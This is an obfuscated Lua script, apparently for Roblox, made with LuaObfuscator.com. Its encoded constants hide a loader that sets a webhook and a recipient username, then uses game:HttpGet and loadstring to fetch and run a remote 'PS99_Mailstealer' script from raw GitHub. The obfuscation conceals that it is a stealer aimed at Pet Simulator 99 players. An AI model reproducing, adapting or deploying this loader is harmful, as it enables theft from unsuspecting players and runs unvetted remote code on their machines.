--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.4) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==2) then function v22() local v31=0 -(619 -(555 + 64)) ;local v32;while true do if ((0 -0)==v31) then v32=v1(v16,v19,v19);v19=v19 + (1 -0) ;v31=1;end if (v31==(2 -1)) then return v32;end end end v23=nil;function v23() local v33,v34=v1(v16,v19,v19 + (933 -(857 + 74)) );v19=v19 + (929 -(214 + 713)) ;return (v34 * 256) + v33 ;end v18=3;end if (v18==4) then function v25() local v35=0 + 0 ;local v36;local v37;local v38;local v39;local v40;local v41;while true do if (v35==((1 -0) + (0 -0))) then v38=878 -(282 + 595) ;v39=(v21(v37,1638 -(1523 + 114 + 0) ,18 + 2 ) * ((2 -(791 -(368 + 423)))^(1097 -(68 + 997)))) + v36 ;v35=1272 -(226 + 1044) ;end if ((0 -0)==v35) then v36=v24();v37=v24();v35=118 -(32 + 85) ;end if (v35==(2 + 0)) then v40=v21(v37,5 + 16 ,988 -(892 + 65) );v41=((v21(v37,75 -43 )==(1 -0)) and  -(1 -0)) or (351 -((273 -186) + 263)) ;v35=3;end if (v35==(183 -(67 + 113))) then if (v40==(1187 -(1069 + 118))) then if (v39==(0 + 0)) then return v41 * (0 -(0 -0)) ;else local v102=0 + 0 ;while true do if (v102==(0 -0)) then v40=953 -(802 + 150) ;v38=0 -(0 -0) ;break;end end end elseif (v40==2047) then return ((v39==(0 -0)) and (v41 * (((1 -0) + 0)/(997 -(915 + 15 + 67))))) or (v41 * NaN) ;end return v8(v41,v40-(2896 -(2315 -(416 + 26))) ) * (v38 + (v39/((2 + 0)^52))) ;end end end v26=nil;function v26(v42) local v43;if  not v42 then v42=v24();if (v42==(0 + 0)) then return "";end end v43=v3(v16,v19,(v19 + v42) -(3 -2) );v19=v19 + v42 ;local v44={};for v70=439 -(145 + 293) , #v43 do v44[v70]=v2(v1(v3(v43,v70,v70)));end return v6(v44);end v18=5;end if (v18==6) then v29=nil;function v29() local v45=0;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v45==4) then while true do if (v46~=1) then else local v98=0 + 0 ;local v99;while true do if (v98==0) then v99=0;while true do if (v99~=0) then else local v114=0 + 0 ;while true do if (v114~=(0 + 0)) then else v49=nil;v50=nil;v114=1;end if (v114~=(27 -(11 + 15))) then else v99=195 -(26 + 168) ;break;end end end if (v99==1) then v46=2;break;end end break;end end end if (v46==(2 -0)) then v51=nil;v52=nil;v46=3;end if (v46==(881 -(284 + 594))) then v53=nil;while true do local v103=0;while true do if (v103==0) then local v110=0;while true do if (v110==(1 -0)) then v103=2 -1 ;break;end if (v110==(166 -(122 + 44))) then if (v47~=(0 -0)) then else local v149=0;local v150;while true do if (v149==(0 -0)) then v150=0 + 0 ;while true do if (v150~=(0 + 0)) then else local v189=0;while true do if (v189==(0 -0)) then v48={};v49={};v189=66 -(30 + 35) ;end if (v189~=(1 + 0)) then else v150=1258 -(1043 + 214) ;break;end end end if (v150~=(3 -2)) then else v50={};v47=1;break;end end break;end end end if (v47==1) then local v151=0;local v152;local v153;while true do if (v151~=(1213 -(323 + 889))) then else while true do if (v152==(0 -0)) then v153=0;while true do if ((580 -(361 + 219))==v153) then local v202=0;local v203;while true do if (v202~=(320 -(53 + 267))) then else v203=0 + 0 ;while true do if (1~=v203) then else v153=1;break;end if (v203~=0) then else v51={v48,v49,nil,v50};v52=v24();v203=1;end end break;end end end if (v153==1) then v53={};v47=7 -5 ;break;end end break;end end break;end if (v151~=0) then else v152=0 + 0 ;v153=nil;v151=1;end end end v110=1 + 0 ;end end end if (1==v103) then if (v47==(853 -(20 + 830))) then local v115=0 + 0 ;local v116;local v117;while true do if (v115~=(127 -(116 + 10))) then else while true do if (v116==(0 + 0)) then v117=0;while true do if (v117==0) then local v190=738 -(542 + 196) ;while true do if (v190==0) then for v204=1 -0 ,v24() do v49[v204-1 ]=v29();end return v51;end end end end break;end end break;end if (v115==0) then v116=0;v117=nil;v115=1;end end end if (v47~=(1 + 1)) then else local v118=0 + 0 ;local v119;local v120;while true do if (v118==(0 + 0)) then v119=0;v120=nil;v118=2 -1 ;end if (v118~=(2 -1)) then else while true do if (0~=v119) then else v120=0;while true do if (v120==(1552 -(1126 + 425))) then for v192=406 -(118 + 287) ,v24() do local v193=0 -0 ;local v194;local v195;local v196;while true do if (v193~=1) then else v196=nil;while true do if (v194==1) then while true do if (v195~=(1121 -(118 + 1003))) then else v196=v22();if (v21(v196,2 -1 ,1)~=0) then else local v212=377 -(142 + 235) ;local v213;local v214;local v215;local v216;local v217;while true do if (v212==0) then local v220=0;while true do if ((0 -0)==v220) then v213=0 + 0 ;v214=nil;v220=1;end if (v220==1) then v212=978 -(553 + 424) ;break;end end end if (v212==(3 -1)) then v217=nil;while true do if (v213==(1 + 0)) then local v221=0;while true do if (v221==(1 + 0)) then v213=2;break;end if (v221==0) then v216=nil;v217=nil;v221=1;end end end if (v213==(0 + 0)) then local v222=0 + 0 ;local v223;while true do if (v222~=(0 + 0)) then else v223=0;while true do if (v223~=(0 -0)) then else local v232=0;while true do if (v232~=(2 -1)) then else v223=2 -1 ;break;end if (v232==0) then v214=0;v215=nil;v232=1;end end end if (v223==1) then v213=1 + 0 ;break;end end break;end end end if (v213~=2) then else while true do if (v214==3) then if (v21(v216,14 -11 ,756 -(239 + 514) )==(1 + 0)) then v217[4]=v53[v217[1333 -(797 + 532) ]];end v48[v192]=v217;break;end if (0~=v214) then else local v225=0;local v226;while true do if (v225~=0) then else v226=0;while true do if (v226==0) then local v234=0;local v235;while true do if (v234~=0) then else v235=0 + 0 ;while true do if (0==v235) then local v242=0 + 0 ;while true do if (v242==0) then v215=v21(v196,2,3);v216=v21(v196,4,13 -7 );v242=1203 -(373 + 829) ;end if (v242==(732 -(476 + 255))) then v235=1;break;end end end if (v235==1) then v226=1;break;end end break;end end end if ((1131 -(369 + 761))==v226) then v214=1;break;end end break;end end end if (v214~=1) then else local v227=0;local v228;while true do if (v227==0) then v228=0 + 0 ;while true do if (v228==1) then v214=2;break;end if (v228==(0 -0)) then local v236=0 -0 ;local v237;while true do if (v236==0) then v237=238 -(64 + 174) ;while true do if (v237~=1) then else v228=1;break;end if (v237==0) then local v243=0;while true do if (v243==(1 + 0)) then v237=1;break;end if (v243==0) then v217={v23(),v23(),nil,nil};if (v215==0) then local v244=0;local v245;while true do if (v244==0) then v245=0;while true do if ((336 -(144 + 192))==v245) then v217[3]=v23();v217[220 -(42 + 174) ]=v23();break;end end break;end end elseif (v215==1) then v217[3 + 0 ]=v24();elseif (v215==2) then v217[3 + 0 ]=v24() -(2^(7 + 9)) ;elseif (v215==3) then local v250=0;local v251;local v252;local v253;while true do if (v250~=(1505 -(363 + 1141))) then else v253=nil;while true do if (v251==1) then while true do if (v252~=(1580 -(1183 + 397))) then else v253=0 -0 ;while true do if (v253==0) then v217[3 + 0 ]=v24() -((2 + 0)^(1991 -(1913 + 62))) ;v217[3 + 1 ]=v23();break;end end break;end end break;end if (v251~=0) then else local v254=0 -0 ;while true do if (v254~=0) then else v252=0;v253=nil;v254=1934 -(565 + 1368) ;end if (v254~=(3 -2)) then else v251=1;break;end end end end break;end if (v250==0) then v251=0;v252=nil;v250=1662 -(1477 + 184) ;end end end v243=1 -0 ;end end end end break;end end end end break;end end end if (v214==2) then local v229=0;while true do if (v229~=1) then else v214=3 + 0 ;break;end if (v229==(856 -(564 + 292))) then local v233=0 -0 ;while true do if (1==v233) then v229=2 -1 ;break;end if (v233~=(304 -(244 + 60))) then else if (v21(v216,1,1 + 0 )~=(477 -(41 + 435))) then else v217[1003 -(938 + 63) ]=v53[v217[2 + 0 ]];end if (v21(v216,1127 -(936 + 189) ,2)==1) then v217[1 + 2 ]=v53[v217[1616 -(1565 + 48) ]];end v233=1;end end end end end end break;end end break;end if (1==v212) then v215=nil;v216=nil;v212=2 + 0 ;end end end break;end end break;end if (v194==(1138 -(782 + 356))) then local v207=267 -(176 + 91) ;local v208;while true do if (v207==0) then v208=0;while true do if (v208~=1) then else v194=2 -1 ;break;end if ((0 -0)==v208) then local v218=1092 -(975 + 117) ;while true do if (v218~=1) then else v208=1876 -(157 + 1718) ;break;end if (v218~=(0 + 0)) then else v195=0;v196=nil;v218=3 -2 ;end end end end break;end end end end break;end if (v193==0) then v194=0;v195=nil;v193=3 -2 ;end end end v47=1021 -(697 + 321) ;break;end if (v120==(0 -0)) then for v197=1,v52 do local v198=0 -0 ;local v199;local v200;local v201;while true do if (v198==(0 -0)) then local v206=0 + 0 ;while true do if (v206~=0) then else v199=0 -0 ;v200=nil;v206=2 -1 ;end if (v206==1) then v198=1228 -(322 + 905) ;break;end end end if (v198==1) then v201=nil;while true do if (v199~=0) then else local v209=611 -(602 + 9) ;local v210;while true do if (v209~=0) then else v210=1189 -(449 + 740) ;while true do if (v210==0) then local v219=0;while true do if (v219==(873 -(826 + 46))) then v210=1;break;end if (v219==0) then v200=v22();v201=nil;v219=948 -(245 + 702) ;end end end if (v210~=(3 -2)) then else v199=1 + 0 ;break;end end break;end end end if (v199~=1) then else if (v200==(1899 -(260 + 1638))) then v201=v22()~=0 ;elseif (v200==(442 -(382 + 58))) then v201=v25();elseif (v200~=3) then else v201=v26();end v53[v197]=v201;break;end end break;end end end v51[9 -6 ]=v22();v120=1 + 0 ;end end break;end end break;end end end break;end end end break;end if (v46==(0 -0)) then local v100=0 -0 ;local v101;while true do if (v100==(1205 -(902 + 303))) then v101=0 -0 ;while true do if (v101==0) then local v121=0 -0 ;while true do if (v121==0) then v47=0;v48=nil;v121=1 + 0 ;end if (v121==1) then v101=1691 -(1121 + 569) ;break;end end end if (v101~=(215 -(22 + 192))) then else v46=1;break;end end break;end end end end break;end if (v45~=0) then else v46=683 -(483 + 200) ;v47=nil;v45=1464 -(1404 + 59) ;end if (v45~=(5 -3)) then else v50=nil;v51=nil;v45=3;end if (v45==3) then v52=nil;v53=nil;v45=4 -0 ;end if (v45==(766 -(468 + 297))) then v48=nil;v49=nil;v45=564 -(334 + 228) ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54) if (v1(v54,2)==79) then v20=v0(v3(v54,1,1));return "";else local v72=0;local v73;while true do if (v72==0) then v73=v2(v0(v54,16));if v20 then local v104=0;local v105;while true do if (v104==1) then return v105;end if (v104==0) then v105=v5(v73,v20);v20=nil;v104=1;end end else return v73;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v55=0 -0 ;local v56;local v57;local v58;local v59;while true do if (((0 + 0) -0)==v55) then v56,v57,v58,v59=v1(v16,v19,v19 + (5 -2) );v19=v19 + 4 ;v55=1 + 0 ;end if ((237 -(141 + (260 -165)))==v55) then return (v59 * (11585568 + 4894827 + 296821)) + (v58 * (168690 -103154)) + (v57 * (615 -359)) + v56 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v60,v61,v62) local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...) local v81=v64;local v82=v65;local v83=v66;local v84=v28;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do v93=v81[v85];v94=v93[1];if (v94<=6) then if (v94<=2) then if (v94<=0) then v62[v93[3]]=v91[v93[2]];elseif (v94>1) then local v122=0;local v123;local v124;while true do if (v122==0) then v123=v93[2];v124=v91[v93[3]];v122=1;end if (v122==1) then v91[v123 + 1 ]=v124;v91[v123]=v124[v93[4]];break;end end else v91[v93[2]]=v62[v93[3]];end elseif (v94<=4) then if (v94>3) then for v147=v93[2],v93[3] do v91[v147]=nil;end else do return;end end elseif (v94>5) then v91[v93[2]]();elseif (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94<=9) then if (v94<=7) then v91[v93[2]]=v93[3]~=0 ;elseif (v94>8) then local v127=0;local v128;local v129;local v130;local v131;while true do if (v127==1) then v86=(v130 + v128) -1 ;v131=0;v127=2;end if (v127==0) then v128=v93[2];v129,v130=v84(v91[v128](v13(v91,v128 + 1 ,v93[3])));v127=1;end if (2==v127) then for v183=v128,v86 do v131=v131 + 1 ;v91[v183]=v129[v131];end break;end end else v91[v93[2]]=v93[3];end elseif (v94<=11) then if (v94>10) then local v134=0;local v135;local v136;local v137;local v138;local v139;while true do if (3==v134) then v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v139=v93[2];v136,v137=v84(v91[v139](v13(v91,v139 + 1 ,v93[3])));v134=4;end if (v134==0) then v135=nil;v136,v137=nil;v138=nil;v139=nil;v62[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v134=1;end if (5==v134) then v91[v139]=v91[v139](v13(v91,v139 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];v134=6;end if (v134==2) then v93=v81[v85];v139=v93[2];v138=v91[v93[3]];v91[v139 + 1 ]=v138;v91[v139]=v138[v93[4]];v85=v85 + 1 ;v134=3;end if (v134==1) then v93=v81[v85];v91[v93[2]]=v62[v93[3]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v62[v93[3]];v85=v85 + 1 ;v134=2;end if (v134==4) then v86=(v137 + v139) -1 ;v135=0;for v186=v139,v86 do v135=v135 + 1 ;v91[v186]=v136[v135];end v85=v85 + 1 ;v93=v81[v85];v139=v93[2];v134=5;end if (v134==6) then v85=v93[3];break;end end else v85=v93[3];end elseif (v94==12) then local v141=0;local v142;while true do if (v141==0) then v142=v93[2];v91[v142]=v91[v142](v13(v91,v142 + 1 ,v86));break;end end else v62[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3]~=0 ;v85=v85 + 1 ;v93=v81[v85];v62[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v85=v93[3];end v85=v85 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v67,v68,v69) if v69 then local v74=0 + 0 ;local v75;while true do if (v74==(0 -0)) then v75=(v67/((2 + 0)^(v68-(164 -((120 -28) + 71)))))%((1 + (1791 -(573 + 1217)))^(((v69-(1 -0)) -(v68-1)) + (766 -(574 + 191)))) ;return v75-(v75%(1 + 0)) ;end end else local v76=0 -0 ;local v77;while true do if (v76==(0 + 0)) then v77=2^(v68-(850 -(254 + 595))) ;return (((v67%(v77 + v77))>=v77) and 1) or (126 -(55 + (196 -125))) ;end end end end v22=nil;v18=2;end end end return v15("LOL!0B3O00028O00026O00F03F03073O00576562682O6F6B030E3O00596F7572204C696E6B2048657265030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B692O75502F50532O395F4D61696C737465616C65722F6D61696E2F4D61696C537465616C65722E6C756103083O00557365726E616D65030A3O00444F473O35362O3738030A3O004C6F61645363722O656E00243O0012083O00014O0004000100013O0026053O00020001000100040A3O00020001001208000100013O002605000100110001000200040A3O00110001001208000200043O00120B000200033O00122O000200053O00122O000300063O00202O00030003000700122O000500086O000300056O00023O00024O00020001000100044O00230001002605000100050001000100040A3O00050001001208000200013O002605000200180001000200040A3O00180001001208000100023O00040A3O00050001002605000200140001000100040A3O001400010012080003000A3O00120D000300096O000300013O00122O0003000B3O00122O000200023O00044O0014000100040A3O0005000100040A3O0023000100040A3O000200012O00033O00017O00",v9(),...);